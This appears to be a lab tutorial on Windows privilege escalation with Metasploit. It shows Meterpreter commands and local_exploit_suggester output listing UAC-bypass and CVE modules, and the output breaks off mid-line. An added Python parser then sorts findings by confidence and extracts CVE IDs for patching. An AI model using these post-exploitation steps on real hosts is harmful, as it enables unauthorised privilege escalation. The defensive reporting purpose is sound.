This article is for information security study only. Please comply with the relevant laws and regulations; it must not be used for illegal purposes. If a reader carries out any action that endangers network security as a result, the consequences are their own responsibility and have nothing to do with the author.
Lab setup:

| Role | OS | Arch | IP |
|---|---|---|---|
| Attacker | Kali Linux | 64-bit | 10.3.0.231 |
| Client | Windows 7 | 64-bit | 10.3.0.234 |
Once we have a session on the target through MSF and try to escalate privileges, an error like the one below means we did not obtain SYSTEM privileges:
meterpreter > getsystem
# Output
[-] priv_elevate_getsystem: Operation failed: 1726 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
Next we demonstrate how to proceed with privilege escalation:
1. Background the session and return to msf
meterpreter > bg
# Output
[*] Backgrounding session 2...
2. Use the local exploit suggester module
# This module quickly identifies vulnerabilities on the system that may be exploitable
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
# Output
msf6 post(multi/recon/local_exploit_suggester) >
3. Set the session
# Find the session ID with sessions -l
msf6 post(multi/recon/local_exploit_suggester) > set session 2
# Output
session => 2
4. Run the module
msf6 post(multi/recon/local_exploit_suggester) > run
# Output
[*] 10.3.0.234 - Collecting local exploits for x64/windows...
[*] 10.3.0.234 - 186 exploit checks are being tried...
[+] 10.3.0.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/
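The suggester output above mixes two very different confidence levels: "The target appears to be vulnerable." means the module's check confirmed the condition, while "could not be validated" only means the build number matched and the check could not verify anything. For a report or a remediation ticket those need to be separated, and the CVE-named modules need to be turned into CVE identifiers that a patch-management team can look up. The following Python parser is an added example written for this article; it is not part of Metasploit or of the original post. It assumes only the line format shown in the output above (a constructed copy of those lines is embedded as sample input) and treats the `bypassuac_` module prefix as a naming convention for UAC bypasses, which depend on the current user already being in the local Administrators group rather than on an unpatched bug.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input, copied in shape from the local_exploit_suggester output on this page.
SAMPLE_OUTPUT = """\
[*] 10.3.0.234 - Collecting local exploits for x64/windows...
[*] 10.3.0.234 - 186 exploit checks are being tried...
[+] 10.3.0.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
"""

# Only "[+]" lines carry findings; "[*]" lines are progress messages and are skipped.
FINDING_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/[^\s:]+):\s+(?P<msg>.*)$"
)
# Module names such as cve_2019_1458_wizardopium embed the CVE identifier.
CVE_RE = re.compile(r"cve_(\d{4})_(\d+)")


@dataclass
class Finding:
    host: str
    module: str
    kind: str        # "uac_bypass", "cve" or "other", derived from the module name
    confidence: str  # "confirmed", "unvalidated" or "unknown", derived from the message
    cve: Optional[str]
    message: str


def classify_message(msg: str) -> str:
    """Map the suggester's wording to a confidence level.

    The 'could not be validated' phrase is checked first because those lines
    also say 'Vulnerable ... build detected', which must not count as confirmed.
    """
    low = msg.lower()
    if "could not be validated" in low:
        return "unvalidated"
    if "appears to be vulnerable" in low:
        return "confirmed"
    return "unknown"


def cve_id(module: str) -> Optional[str]:
    """Return 'CVE-YYYY-NNNN' if the module name embeds one, else None."""
    m = CVE_RE.search(module)
    return f"CVE-{m.group(1)}-{m.group(2)}" if m else None


def module_kind(module: str) -> str:
    name = module.rsplit("/", 1)[-1]
    if name.startswith("bypassuac"):
        return "uac_bypass"
    if CVE_RE.search(name):
        return "cve"
    return "other"


def parse_suggester(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        m = FINDING_RE.match(line.strip())
        if not m:
            continue
        module = m["module"]
        findings.append(Finding(
            host=m["host"],
            module=module,
            kind=module_kind(module),
            confidence=classify_message(m["msg"]),
            cve=cve_id(module),
            message=m["msg"],
        ))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, List[str]]:
    """Group module names by confidence so confirmed and unvalidated hits are reported apart."""
    return {
        level: [f.module for f in findings if f.confidence == level]
        for level in ("confirmed", "unvalidated", "unknown")
    }


def patch_list(findings: List[Finding]) -> List[str]:
    """CVE identifiers (deduplicated, in order) that the patch-management team should look up."""
    seen: List[str] = []
    for f in findings:
        if f.cve and f.cve not in seen:
            seen.append(f.cve)
    return seen


if __name__ == "__main__":
    found = parse_suggester(SAMPLE_OUTPUT)
    for level, modules in summarize(found).items():
        print(f"{level}: {len(modules)}")
        for mod in modules:
            print(f"  {mod}")
    print("CVEs to check against patch status:", ", ".join(patch_list(found)))
```

The "unvalidated" bucket is the one to treat with care: it is a build-number match, not evidence, so it goes into the report as "verify manually" rather than as a confirmed finding. The `uac_bypass` entries have no CVE to patch; the corresponding mitigation is not running day-to-day users as members of the local Administrators group.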